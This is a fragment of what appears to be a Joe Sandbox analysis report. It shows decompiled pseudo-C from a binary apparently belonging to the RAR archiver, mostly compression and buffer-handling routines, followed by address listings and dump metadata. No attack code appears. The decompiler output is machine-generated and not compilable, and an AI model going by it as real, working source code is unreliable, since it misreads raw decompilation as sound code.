				E00007FF67FF650B6C1A0(_t159, 0, _t492, r14d +  *((intOrPtr*)( *((intOrPtr*)(_t454 + 0xb8)))), r12d);
				_t360 =  *((intOrPtr*)(_t440 + 4)) +  *_t478;
				_t252 =  *((intOrPtr*)(_t454 + 0xc8)) + r8d &  *(_t435 + 0x52c);
				_t228 =  *_t440;
				_t300 = _t228;
				if (_t300 == 0) goto 0x50b3dd41;
				if (_t300 == 0) goto 0x50b3dd16;
				if (_t300 == 0) goto 0x50b3dd16;
				if (_t300 == 0) goto 0x50b3dcf7;
				if (_t300 == 0) goto 0x50b3dcdf;
				if (_t228 - 0xfffffffffffffffd != 1) goto 0x50b3dd5e;
				r8d =  *(_t440 + 8);
				 *(_t454 + 0x20) =  *((intOrPtr*)(_t435 + 0x1c658)) + r8d;
				E00007FF67FF650B3FCD8(_t360, _t435, _t360, _t435, _t440,  *((intOrPtr*)(_t440 + 4)), _t492);
				goto 0x50b3dd5e;
				r8d =  *(_t440 + 8);
				 *(_t454 + 0x20) = _t252;
				E00007FF67FF650B3FEA0(_t360, _t435, _t360, _t435, _t440, _t492);
				goto 0x50b3dd5e;
				r8d =  *(_t440 + 8);
				 *(_t454 + 0x28) = _t252;
				 *(_t454 + 0x20) =  *(_t440 + 0xc);
				E00007FF67FF650B3F7A0(_t435, _t360, _t492, _t474);
				goto 0x50b3dd5e;
				_t253 = _t252 & 0xffffff00 |  *_t440 == 0x00000002;
				r8d =  *(_t440 + 8);
				 *(_t454 + 0x28) = _t253;
				 *(_t454 + 0x20) =  *((intOrPtr*)(_t435 + 0x1c658)) + r8d;
				E00007FF67FF650B3FBFC(_t360, _t360, _t492, _t474);
				goto 0x50b3dd5e;
				_t470 = _t492;
				r8d =  *(_t440 + 8);
				 *(_t454 + 0x28) = _t253;
				 *(_t454 + 0x20) =  *(_t440 + 0xc);
				E00007FF67FF650B3FAAC(_t360, _t435, _t360, _t492, _t474);
				if (_t290 == 0xffffffff) goto 0x50b3dd6c;
				goto 0x50b3dd71;
				 *((intOrPtr*)(_t454 + 0xb0)) =  *((intOrPtr*)(_t454 + 0xb0)) + 1;
				 *((intOrPtr*)(_t492 + 0x44)) =  *((intOrPtr*)(_t440 + 4)) +  *((intOrPtr*)(_t492 + 0x44));
				if ( *((intOrPtr*)(_t483 + 0x50)) != _t360) goto 0x50b3dd8b;
				if (_t290 == 0xffffffff) goto 0x50b3dde5;
				if (_t290 != 0xffffffff) goto 0x50b3ddb9;
				if ( *((intOrPtr*)(_t440 + 4)) == 0) goto 0x50b3ddb6;
				E00007FF67FF650B3D484(_t348, _t360, _t435,  *((intOrPtr*)(_t440 + 4)));
				E00007FF67FF650B6BAF0();
				_t291 =  *((intOrPtr*)(_t440 + 4));
				E00007FF67FF650B3D484(_t348, _t360, _t435,  *((intOrPtr*)(_t483 + 0x48)) + _t291);
				E00007FF67FF650B6BAF0();
				_t292 = _t291 +  *((intOrPtr*)(_t483 + 0x48));
				r14d =  *(_t440 + 8);
				_t238 =  *((intOrPtr*)(_t454 + 0x30)) + 1;
				r14d = r14d +  *((intOrPtr*)(_t440 + 4));
				 *((intOrPtr*)(_t454 + 0x30)) = _t238;
				if (_t238 -  *((intOrPtr*)(_t435 + 0x4550)) < 0) goto 0x50b3dc11;
				if (_t292 == 0xffffffff) goto 0x50b3de51;
				_t494 =  *((intOrPtr*)(_t454 + 0xc0));
				if ( *_t494 - r14d <= 0) goto 0x50b3de43;
				_t216 = _t440 + _t449;
				E00007FF67FF650B3D484(_t348, _t360, _t435, _t216);
				_t428 = r14d +  *_t478;
				_t385 = _t292 +  *((intOrPtr*)(_t435 + 0x1a600));
				E00007FF67FF650B6BAF0();
				_t349 =  *((intOrPtr*)(_t435 + 0x1a600));
				 *_t478 = _t349;
				 *_t494 = _t216;
				_t484 =  *((intOrPtr*)(_t454 + 0xb0));
				_t63 = _t349 - 1; // -1
				_t294 = _t63;
				if (_t294 <= 0) goto 0x50b3df7b;
				_t64 = _t428 + 1; // 0x1
				_t462 = _t64;
				r9d = 0;
				_t65 = _t385 + 1; // 0x1
				r11d = _t65;
				if (_t462 - _t484 >= 0) goto 0x50b3df6e;
				_t441 = (r14d +  *_t478) * 0x58;
				r14d =  *(_t441 + _t435 + 0x459c);
				_t472 = _t435 + 0x45a0 + _t462 * 0x58;
				if ( *((intOrPtr*)(_t472 - 4)) != r14d) goto 0x50b3dec2;
				if ( *_t472 !=  *((intOrPtr*)(_t441 + _t435 + 0x45a0))) goto 0x50b3dec2;
				r9d = r11d;
				_t362 = _t462;
				r11d = r11d + 1;
				_t473 = _t472 + 0x58;
				if (_t462 + 1 - _t484 < 0) goto 0x50b3de9b;
				if (r9d == 0) goto 0x50b3df6e;
				asm("cdq");
				_t317 = r9d + 1 >> 1;
				if (_t317 <= 0) goto 0x50b3df68;
				asm("movsd xmm2, [ecx+0x50]");
				asm("movups xmm0, [edx]");
				asm("movups xmm3, [ecx]");
				asm("movups xmm4, [ecx+0x10]");
				asm("movups xmm5, [ecx+0x20]");
				asm("movups xmm6, [ecx+0x30]");
				asm("movups xmm7, [ecx+0x40]");
				asm("movups [ecx], xmm0");
				asm("movups xmm1, [edx+0x10]");
				asm("movups [ecx-0x48], xmm1");
				asm("movups xmm0, [edx+0x20]");
				asm("movups [ecx-0x38], xmm0");
				asm("movups xmm1, [edx+0x30]");
				asm("movups [ecx-0x28], xmm1");
				asm("movups xmm0, [edx+0x40]");
				asm("movups [ecx-0x18], xmm0");
				asm("movsd xmm1, [edx+0x50]");
				asm("movsd [ecx-0x8], xmm1");
				asm("movups [edx], xmm3");
				asm("movups [edx+0x10], xmm4");
				asm("movups [edx+0x20], xmm5");
				asm("movups [edx+0x30], xmm6");
				asm("movups [edx+0x40], xmm7");
				asm("movsd [edx+0x50], xmm2");
				if (_t317 != 0) goto 0x50b3defa;
				_t433 = _t362 + 1;
				if (r9d + 1 - _t294 < 0) goto 0x50b3de6a;
				if (_t484 <= 0) goto 0x50b3e2a8;
				_t488 = _t435 + 0x4558;
				_t217 =  *(_t435 + 0x1a5d8);
				r15b = 1;
				if (_t217 <= 0) goto 0x50b3dfc0;
				if ( *((intOrPtr*)(_t435 + 0x1a558)) ==  *_t488) goto 0x50b3dfbb;
				if (1 - _t217 < 0) goto 0x50b3dfab;
				goto 0x50b3dfc0;
				r15b = 0;
				E00007FF67FF650B47090(1, _t435 + 0x1a610);
				if ( *((char*)(_t435 + 0x1a5e0)) == 0) goto 0x50b3dff7;
				sil = 0x80;
				E00007FF67FF650B4323C(0, _t362, _t435, _t362 + 1, _t435, _t441, _t449, _t492, _t472 + 0x58, _t491, _t487);
				r15b = 1;
				 *(_t435 + 0x1a5d8) = _t362 * 0x58;
				 *((char*)(_t435 + 0x1a5e0)) = 0;
				r12d = 0;
				goto 0x50b3e002;
				sil = 0;
				r12d = 0;
				if (r15b == 0) goto 0x50b3e019;
				 *((intOrPtr*)(_t435 + 0x1a558 +  *(_t435 + 0x1a5d8) * 4)) =  *_t488;
				 *(_t435 + 0x1a5d8) =  *(_t435 + 0x1a5d8) + 1;
				if (0 ==  *((intOrPtr*)(_t435 + 0x1a5dc))) goto 0x50b3e02f;
				_t394 = _t435;
				sil = 0x80;
				E00007FF67FF650B4323C(_t362 + 1, _t362, _t394, _t362 + 1, _t435, _t441, _t449, _t492, _t472 + 0x58, _t482, _t475);
				 *((intOrPtr*)(_t435 + 0x1a5dc)) = 0;
				r8d = 0x102;
				_t296 =  <  ? sil & 0xffffffff : (sil | 0x00000040) & 0x000000ff;
				_t260 =  <  ?  *((intOrPtr*)(_t488 + 0x44)) -  *((intOrPtr*)(_t435 + 0x1c64c)) +  *((intOrPtr*)(_t435 + 0x534)) &  *(_t435 + 0x52c) : _t394 - 0x102;
				E00007FF67FF650B4323C( <  ?  *((intOrPtr*)(_t488 + 0x44)) -  *((intOrPtr*)(_t435 + 0x1c64c)) +  *((intOrPtr*)(_t435 + 0x534)) &  *(_t435 + 0x52c) : _t394 - 0x102, _t362, _t435, _t362 + 1, _t435, _t441, _t449, _t492, _t472 + 0x58, _t434, _t437);
				if (r15b != 0) goto 0x50b3e08b;
				if ( *((intOrPtr*)(_t435 + 0x1a598)) ==  *((intOrPtr*)(_t488 + 0x48))) goto 0x50b3e09a;
				goto 0x50b3e08e;
				_t364 = r12d;
				bpl = bpl | 0x00000020;
				E00007FF67FF650B4323C( *((intOrPtr*)(_t488 + 0x48)), _t364, _t435, _t362 + 1, _t435, _t441, _t449, _t492, _t472 + 0x58, _t449, _t358);
				 *((intOrPtr*)(_t435 + 0x1a598 + _t364 * 4)) =  *((intOrPtr*)(_t488 + 0x48));
				_t196 =  *(_t488 + 4) & 0x000000ff;
				if (_t196 == 0) goto 0x50b3e0f3;
				r8d = _t196;
				bpl = bpl | 0x00000010;
				E00007FF67FF650B472B0(7, _t364, _t435 + 0x1a610, _t441);
				_t442 = _t488 + 8;
				if (( *(_t488 + 4) & 0x00000001 << 0) == 0) goto 0x50b3e0e8;
				E00007FF67FF650B4323C( *_t442, _t364, _t435, _t362 + 1, _t435, _t442, _t449, _t492, _t472 + 0x58);
				_t443 = _t442 + 4;
				if (1 - 7 < 0) goto 0x50b3e0cf;
				if (r15b == 0) goto 0x50b3e12f;
				E00007FF67FF650B4323C( *((intOrPtr*)(_t488 + 0x30)), _t364, _t435, _t362 + 1, _t435, _t443, _t449, _t470, _t472 + 0x58);
				if ( *((intOrPtr*)(_t488 + 0x30)) <= 0) goto 0x50b3e12f;
				r8d =  *(_t443 +  *((intOrPtr*)(_t488 + 0x28))) & 0x000000ff;
				E00007FF67FF650B472B0(8, _t364, _t435 + 0x1a610, _t443);
				_t444 = _t443 + 1;
				if (1 -  *((intOrPtr*)(_t488 + 0x30)) < 0) goto 0x50b3e10e;
				if ( *((intOrPtr*)(_t488 + 0x40)) == 0) goto 0x50b3e16e;
				bpl = bpl | 0x00000008;
				E00007FF67FF650B4323C( *((intOrPtr*)(_t488 + 0x40)), _t364, _t435, _t433, _t435, _t444, _t449, _t470, _t473);
				if ( *((intOrPtr*)(_t488 + 0x40)) <= 0) goto 0x50b3e16e;
				r8d =  *(_t444 +  *((intOrPtr*)(_t488 + 0x38))) & 0x000000ff;
				E00007FF67FF650B472B0(8, _t364, _t435 + 0x1a610, _t444);
				_t445 = _t444 + 1;
				if (1 -  *((intOrPtr*)(_t488 + 0x40)) < 0) goto 0x50b3e14d;
				E00007FF67FF650B47004( *((intOrPtr*)(_t488 + 0x38)), _t364, _t435 + 0x1a610, _t433, _t445);
				_t226 =  *(_t435 + 0x1a630);
				if (_t226 - 6 > 0) goto 0x50b3e186;
				goto 0x50b3e194;
				sil = _t226 - 0x106 > 0;
				sil = sil + 6;
				sil = sil | bpl;
				if ( *((intOrPtr*)(_t435 + 0x544)) != 2) goto 0x50b3e226;
				_t450 = _t435 + 0x1c668;
				E00007FF67FF650B5F14C( *((intOrPtr*)(_t435 + 0x21334)), _t364, _t435 + 0x1c668, _t435, _t445, _t435 + 0x1c668);
				E00007FF67FF650B5F14C(3, _t364, _t435 + 0x1c668, _t435, _t445, _t435 + 0x1c668);
				E00007FF67FF650B5F14C(sil & 0xffffffff, _t364, _t450, _t435, _t445, _t450);
				if (_t226 - 6 <= 0) goto 0x50b3e1fe;
				if (_t226 - 0x106 > 0) goto 0x50b3e1ec;
				E00007FF67FF650B5F14C(_t364 - 7, _t364, _t450, _t435, _t445, _t450);
				goto 0x50b3e206;
				E00007FF67FF650B5F14C(_t226 >> 8, _t364, _t450, _t435, _t445, _t450);
				goto 0x50b3e1e5;
				_t343 = _t226;
				if (_t343 == 0) goto 0x50b3e29a;
				E00007FF67FF650B5F14C( *(_t445 +  *((intOrPtr*)(_t435 + 0x1a628))) & 0x000000ff, _t364, _t450, _t435, _t445, _t450);
				_t446 = _t445 + 1;
				if (_t343 != 0) goto 0x50b3e208;
				goto 0x50b3e29a;
				_t451 = _t435 + 0x21598;
				_t410 = _t451;
				E00007FF67FF650B22054(_t364 - 1 + 0x14, _t410);
				_t355 =  *((intOrPtr*)(_t451 + 0x10));
				 *((char*)(_t355 + _t410 * 8)) = 7;
				 *(_t355 + 1 + _t410 * 8) = sil;
				 *(_t355 + 4 + _t410 * 8) = _t226;
				 *((intOrPtr*)(_t451 + 0x1c)) =  *((intOrPtr*)(_t451 + 0x1c)) + 1;
				if ( *((intOrPtr*)(_t451 + 0x1c)) -  *((intOrPtr*)(_t451 + 0x18)) < 0) goto 0x50b3e25f;
				_t411 = _t451;
				E00007FF67FF650B21BD4(_t364 - 1, _t411, _t446, _t451, _t474);
				if (_t226 == 0) goto 0x50b3e29a;
				_t357 =  *((intOrPtr*)(_t451 + 0x10));
				 *((char*)(_t357 + _t411 * 8)) = 8;
				 *((char*)(_t357 + 4 + _t411 * 8)) =  *((intOrPtr*)(_t446 +  *((intOrPtr*)(_t435 + 0x1a628))));
				 *((intOrPtr*)(_t451 + 0x1c)) =  *((intOrPtr*)(_t451 + 0x1c)) + 1;
				_t346 =  *((intOrPtr*)(_t451 + 0x1c)) -  *((intOrPtr*)(_t451 + 0x18));
				if (_t346 < 0) goto 0x50b3e291;
				_t214 = E00007FF67FF650B21BD4(_t364 - 1, _t451, _t446, _t451, _t474);
				if (_t346 != 0) goto 0x50b3e265;
				if (_t484 - 1 != 0) goto 0x50b3df92;
				asm("movaps xmm6, [esp+0x50]");
				asm("movaps xmm7, [esp+0x40]");
				return _t214;
			}


































































                                                                                                            0x7ff650b3dbbc
                                                                                                            0x7ff650b3dbbc
                                                                                                            0x7ff650b3dbbf
                                                                                                            0x7ff650b3dbc3
                                                                                                            0x7ff650b3dbc7
                                                                                                            0x7ff650b3dbd7
                                                                                                            0x7ff650b3dbdb
                                                                                                            0x7ff650b3dbde
                                                                                                            0x7ff650b3dbe4
                                                                                                            0x7ff650b3dbea
                                                                                                            0x7ff650b3dbf1
                                                                                                            0x7ff650b3dbf8
                                                                                                            0x7ff650b3dc04
                                                                                                            0x7ff650b3dc0a
                                                                                                            0x7ff650b3dc13
                                                                                                            0x7ff650b3dc1e
                                                                                                            0x7ff650b3dc24
                                                                                                            0x7ff650b3dc26
                                                                                                            0x7ff650b3dc2a
                                                                                                            0x7ff650b3dc30
                                                                                                            0x7ff650b3dc32
                                                                                                            0x7ff650b3dc3c
                                                                                                            0x7ff650b3dc59
                                                                                                            0x7ff650b3dc5d
                                                                                                            0x7ff650b3dc62
                                                                                                            0x7ff650b3dc64
                                                                                                            0x7ff650b3dc66
                                                                                                            0x7ff650b3dc73
                                                                                                            0x7ff650b3dc73
                                                                                                            0x7ff650b3dc77
                                                                                                            0x7ff650b3dc8a
                                                                                                            0x7ff650b3dc91
                                                                                                            0x7ff650b3dc97
                                                                                                            0x7ff650b3dc99
                                                                                                            0x7ff650b3dc9b
                                                                                                            0x7ff650b3dca4
                                                                                                            0x7ff650b3dca9
                                                                                                            0x7ff650b3dcae
                                                                                                            0x7ff650b3dcb3
                                                                                                            0x7ff650b3dcb8
                                                                                                            0x7ff650b3dccd
                                                                                                            0x7ff650b3dcd1
                                                                                                            0x7ff650b3dcd8
                                                                                                            0x7ff650b3dcdd
                                                                                                            0x7ff650b3dcdf
                                                                                                            0x7ff650b3dce6
                                                                                                            0x7ff650b3dcf0
                                                                                                            0x7ff650b3dcf5
                                                                                                            0x7ff650b3dcfd
                                                                                                            0x7ff650b3dd04
                                                                                                            0x7ff650b3dd0b
                                                                                                            0x7ff650b3dd0f
                                                                                                            0x7ff650b3dd14
                                                                                                            0x7ff650b3dd22
                                                                                                            0x7ff650b3dd28
                                                                                                            0x7ff650b3dd2c
                                                                                                            0x7ff650b3dd33
                                                                                                            0x7ff650b3dd3a
                                                                                                            0x7ff650b3dd3f
                                                                                                            0x7ff650b3dd44
                                                                                                            0x7ff650b3dd47
                                                                                                            0x7ff650b3dd4e
                                                                                                            0x7ff650b3dd55
                                                                                                            0x7ff650b3dd59
                                                                                                            0x7ff650b3dd65
                                                                                                            0x7ff650b3dd6a
                                                                                                            0x7ff650b3dd71
                                                                                                            0x7ff650b3dd78
                                                                                                            0x7ff650b3dd84
                                                                                                            0x7ff650b3dd89
                                                                                                            0x7ff650b3dd8e
                                                                                                            0x7ff650b3dd94
                                                                                                            0x7ff650b3dd9d
                                                                                                            0x7ff650b3ddb1
                                                                                                            0x7ff650b3ddb6
                                                                                                            0x7ff650b3ddc5
                                                                                                            0x7ff650b3dddc
                                                                                                            0x7ff650b3dde1
                                                                                                            0x7ff650b3dde9
                                                                                                            0x7ff650b3dded
                                                                                                            0x7ff650b3ddef
                                                                                                            0x7ff650b3ddf3
                                                                                                            0x7ff650b3ddfd
                                                                                                            0x7ff650b3de06
                                                                                                            0x7ff650b3de08
                                                                                                            0x7ff650b3de18
                                                                                                            0x7ff650b3de1a
                                                                                                            0x7ff650b3de23
                                                                                                            0x7ff650b3de2b
                                                                                                            0x7ff650b3de32
                                                                                                            0x7ff650b3de3c
                                                                                                            0x7ff650b3de43
                                                                                                            0x7ff650b3de4a
                                                                                                            0x7ff650b3de4e
                                                                                                            0x7ff650b3de5a
                                                                                                            0x7ff650b3de5d
                                                                                                            0x7ff650b3de5d
                                                                                                            0x7ff650b3de62
                                                                                                            0x7ff650b3de6a
                                                                                                            0x7ff650b3de6a
                                                                                                            0x7ff650b3de6e
                                                                                                            0x7ff650b3de71
                                                                                                            0x7ff650b3de71
                                                                                                            0x7ff650b3de7b
                                                                                                            0x7ff650b3de81
                                                                                                            0x7ff650b3de89
                                                                                                            0x7ff650b3de98
                                                                                                            0x7ff650b3de9f
                                                                                                            0x7ff650b3deab
                                                                                                            0x7ff650b3dead
                                                                                                            0x7ff650b3deb0
                                                                                                            0x7ff650b3deb3
                                                                                                            0x7ff650b3deb9
                                                                                                            0x7ff650b3dec0
                                                                                                            0x7ff650b3dec5
                                                                                                            0x7ff650b3ded2
                                                                                                            0x7ff650b3deda
                                                                                                            0x7ff650b3dedc
                                                                                                            0x7ff650b3defa
                                                                                                            0x7ff650b3deff
                                                                                                            0x7ff650b3df02
                                                                                                            0x7ff650b3df05
                                                                                                            0x7ff650b3df09
                                                                                                            0x7ff650b3df0d
                                                                                                            0x7ff650b3df11
                                                                                                            0x7ff650b3df15
                                                                                                            0x7ff650b3df1c
                                                                                                            0x7ff650b3df20
                                                                                                            0x7ff650b3df24
                                                                                                            0x7ff650b3df28
                                                                                                            0x7ff650b3df2c
                                                                                                            0x7ff650b3df30
                                                                                                            0x7ff650b3df34
                                                                                                            0x7ff650b3df38
                                                                                                            0x7ff650b3df3c
                                                                                                            0x7ff650b3df41
                                                                                                            0x7ff650b3df46
                                                                                                            0x7ff650b3df49
                                                                                                            0x7ff650b3df4d
                                                                                                            0x7ff650b3df51
                                                                                                            0x7ff650b3df55
                                                                                                            0x7ff650b3df59
                                                                                                            0x7ff650b3df66
                                                                                                            0x7ff650b3df70
                                                                                                            0x7ff650b3df75
                                                                                                            0x7ff650b3df7e
                                                                                                            0x7ff650b3df8b
                                                                                                            0x7ff650b3df92
                                                                                                            0x7ff650b3df9a
                                                                                                            0x7ff650b3df9f
                                                                                                            0x7ff650b3dfad
                                                                                                            0x7ff650b3dfb7
                                                                                                            0x7ff650b3dfb9
                                                                                                            0x7ff650b3dfbd
                                                                                                            0x7ff650b3dfc3
                                                                                                            0x7ff650b3dfcf
                                                                                                            0x7ff650b3dfd6
                                                                                                            0x7ff650b3dfd9
                                                                                                            0x7ff650b3dfe0
                                                                                                            0x7ff650b3dfe3
                                                                                                            0x7ff650b3dfec
                                                                                                            0x7ff650b3dff2
                                                                                                            0x7ff650b3dff5
                                                                                                            0x7ff650b3dff7
                                                                                                            0x7ff650b3dffa
                                                                                                            0x7ff650b3e000
                                                                                                            0x7ff650b3e00c
                                                                                                            0x7ff650b3e013
                                                                                                            0x7ff650b3e01f
                                                                                                            0x7ff650b3e024
                                                                                                            0x7ff650b3e027
                                                                                                            0x7ff650b3e02a
                                                                                                            0x7ff650b3e032
                                                                                                            0x7ff650b3e044
                                                                                                            0x7ff650b3e060
                                                                                                            0x7ff650b3e069
                                                                                                            0x7ff650b3e06f
                                                                                                            0x7ff650b3e07b
                                                                                                            0x7ff650b3e087
                                                                                                            0x7ff650b3e089
                                                                                                            0x7ff650b3e08b
                                                                                                            0x7ff650b3e08e
                                                                                                            0x7ff650b3e095
                                                                                                            0x7ff650b3e0a5
                                                                                                            0x7ff650b3e0ac
                                                                                                            0x7ff650b3e0b3
                                                                                                            0x7ff650b3e0b5
                                                                                                            0x7ff650b3e0c0
                                                                                                            0x7ff650b3e0c4
                                                                                                            0x7ff650b3e0cb
                                                                                                            0x7ff650b3e0dc
                                                                                                            0x7ff650b3e0e3
                                                                                                            0x7ff650b3e0ea
                                                                                                            0x7ff650b3e0f1
                                                                                                            0x7ff650b3e0f6
                                                                                                            0x7ff650b3e0ff
                                                                                                            0x7ff650b3e10c
                                                                                                            0x7ff650b3e11a
                                                                                                            0x7ff650b3e11f
                                                                                                            0x7ff650b3e126
                                                                                                            0x7ff650b3e12d
                                                                                                            0x7ff650b3e135
                                                                                                            0x7ff650b3e13a
                                                                                                            0x7ff650b3e13e
                                                                                                            0x7ff650b3e14b
                                                                                                            0x7ff650b3e159
                                                                                                            0x7ff650b3e15e
                                                                                                            0x7ff650b3e165
                                                                                                            0x7ff650b3e16c
                                                                                                            0x7ff650b3e171
                                                                                                            0x7ff650b3e176
                                                                                                            0x7ff650b3e17f
                                                                                                            0x7ff650b3e184
                                                                                                            0x7ff650b3e18c
                                                                                                            0x7ff650b3e190
                                                                                                            0x7ff650b3e194
                                                                                                            0x7ff650b3e19e
                                                                                                            0x7ff650b3e1aa
                                                                                                            0x7ff650b3e1b4
                                                                                                            0x7ff650b3e1c1
                                                                                                            0x7ff650b3e1cd
                                                                                                            0x7ff650b3e1d5
                                                                                                            0x7ff650b3e1e0
                                                                                                            0x7ff650b3e1e5
                                                                                                            0x7ff650b3e1ea
                                                                                                            0x7ff650b3e1f1
                                                                                                            0x7ff650b3e1fc
                                                                                                            0x7ff650b3e1fe
                                                                                                            0x7ff650b3e200
                                                                                                            0x7ff650b3e216
                                                                                                            0x7ff650b3e21b
                                                                                                            0x7ff650b3e222
                                                                                                            0x7ff650b3e224
                                                                                                            0x7ff650b3e226
                                                                                                            0x7ff650b3e22d
                                                                                                            0x7ff650b3e233
                                                                                                            0x7ff650b3e23b
                                                                                                            0x7ff650b3e23f
                                                                                                            0x7ff650b3e243
                                                                                                            0x7ff650b3e248
                                                                                                            0x7ff650b3e24c
                                                                                                            0x7ff650b3e255
                                                                                                            0x7ff650b3e257
                                                                                                            0x7ff650b3e25a
                                                                                                            0x7ff650b3e261
                                                                                                            0x7ff650b3e272
                                                                                                            0x7ff650b3e276
                                                                                                            0x7ff650b3e27a
                                                                                                            0x7ff650b3e27e
                                                                                                            0x7ff650b3e284
                                                                                                            0x7ff650b3e287
                                                                                                            0x7ff650b3e28c
                                                                                                            0x7ff650b3e298
                                                                                                            0x7ff650b3e2a2
                                                                                                            0x7ff650b3e2a8
                                                                                                            0x7ff650b3e2ad
                                                                                                            0x7ff650b3e2c2

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 68beac4b4c49a1ce068da2f80b23f41b22b1285c875196aaee189bc5e61e0ac0
                                                                                                            • Instruction ID: c5b46b59d0371b0cef41c8c0d48ec165f98c89fc50347e04b5a95c831f55e1e0
                                                                                                            • Opcode Fuzzy Hash: 68beac4b4c49a1ce068da2f80b23f41b22b1285c875196aaee189bc5e61e0ac0
                                                                                                            • Instruction Fuzzy Hash: 2222D032A08A82A7DB28DF2595801FD7361FB4AB44F198235DF5AA7786DF3AE451C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B692C4 Relevance: .5, Instructions: 493COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 67%
                                                                                                            			E00007FF67FF650B692C4(void* __edx, void* __ebp, void* __esp, void* __rax, long long __rcx, long long __rdx, long long __r8, signed long long __r9, void* __r10, void* __r11) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t195;
				signed int _t216;
				void* _t238;
				void* _t243;
				void* _t289;
				signed long long _t348;
				long long _t355;
				void* _t356;
				signed long long _t359;
				long long _t372;
				signed long long _t378;
				long long* _t381;
				signed long long _t387;
				signed long long _t412;
				intOrPtr* _t436;
				intOrPtr _t447;
				intOrPtr* _t459;
				void* _t462;
				unsigned long long _t465;
				void* _t473;
				signed long long _t475;
				intOrPtr* _t476;
				intOrPtr* _t478;
				void* _t479;
				void* _t480;
				signed long long _t481;
				signed long long* _t503;
				long long _t506;
				signed long long* _t507;
				signed long long _t508;
				void* _t509;
				intOrPtr _t510;
				signed long long _t511;
				long long _t515;

				_t505 = __r11;
				_t504 = __r10;
				_t289 = __ebp;
				_t479 = _t480 - 0x2fc8;
				E00007FF67FF650B69CB0(0x30c8, __rax, __r10, __r11);
				_t481 = _t480 - __rax;
				_t348 =  *0x50b978f0; // 0x27db226282f1
				 *(_t479 + 0x2fb0) = _t348 ^ _t481;
				_t508 = __r9;
				_t506 = __r8;
				 *((long long*)(_t481 + 0x60)) = __r8;
				_t511 = __rdx;
				 *((long long*)(_t481 + 0x48)) = __rdx;
				_t476 = __rcx;
				 *((long long*)(_t481 + 0x58)) = __rcx;
				if ( *(__rcx + 0x7fa2) != 0) goto 0x50b69b2f;
				_t510 =  *((intOrPtr*)(__rcx + 0x22d8));
				 *(__rcx + 0x7fa2) = dil;
				if (__rdx == 0) goto 0x50b693ee;
				if (__r8 == 0) goto 0x50b693ee;
				if (__r9 == 0) goto 0x50b693ee;
				if ( *((intOrPtr*)(__rdx + 0x1070)) -  *((intOrPtr*)(__r9 + 0x118)) >= 0) goto 0x50b69363;
				 *(__rdx + 0x10aa) = dil;
				 *((long long*)(__rdx + 0x1068)) =  *((intOrPtr*)(__r9 + 0x120));
				if ( *(__rdx + 0x10a9) == 0) goto 0x50b69380;
				 *(__rdx + 0x10a8) = dil;
				 *(__rdx + 0x10a9) = dil;
				_t370 = __rdx + 0x1080;
				_t473 = __r9 + 0x168;
				E00007FF67FF650B3679C(__edx, _t473, __rdx + 0x1080, __rcx, _t479, __r9, _t504);
				r8d = 0;
				 *0x50b80550();
				r12d = 0;
				 *(_t481 + 0x20) = r12b;
				r9d = 0;
				E00007FF67FF650B1B4D8( *((intOrPtr*)(_t511 + 4)),  *((intOrPtr*)( *((intOrPtr*)(__rcx)) + 0x20)), __rcx,  *((intOrPtr*)(__r8)), _t511, _t504, _t505);
				 *((long long*)(_t508 + 0x120)) = __r8;
				r8d =  *((intOrPtr*)(_t510 + 0x9518));
				E00007FF67FF650B366EC( *_t370, _t370, _t473, __rcx, _t504, _t505);
				_t25 = _t506 + 1; // 0x1
				_t288 = _t25;
				r13d = 0;
				r12b = r13b;
				 *((intOrPtr*)(_t479 + 0x1fb0)) = r13w;
				if ( *(_t476 + 0x7f7d) != r13b) goto 0x50b694db;
				 *(_t476 + 0x7f7d) = dil;
				 *(_t476 + 0x7f81) = dil;
				if ( *((intOrPtr*)(_t510 + 0x71cc)) == r13b) goto 0x50b69430;
				 *(_t476 + 0x7f82) = r13b;
				goto 0x50b694c7;
				 *(_t476 + 0x7f82) = dil;
				_t387 = _t508;
				_t447 =  *((intOrPtr*)(_t510 + 0x7188));
				if (_t447 == 0) goto 0x50b6946a;
				_t355 =  <=  ?  *((intOrPtr*)(_t510 + 0x7178)) :  *((intOrPtr*)( *((intOrPtr*)(_t510 + 0x7180)) + _t387 * 8));
				_t372 = _t355;
				if (_t387 + _t473 - _t447 < 0) goto 0x50b69454;
				if ( *((intOrPtr*)(_t510 + 0x714c)) == r13d) goto 0x50b69491;
				E00007FF67FF650B68B9C(_t372, _t476, _t372, _t476, _t479, _t372);
				_t356 = _t372 - _t355;
				_t375 =  >  ? _t356 : _t473;
				 *(_t481 + 0x20) =  *((intOrPtr*)(_t476 + 0x7fb8)) +  *((intOrPtr*)(_t476 + 0x7fb0));
				_t498 =  >  ? _t356 : _t473;
				r8d = 0x800;
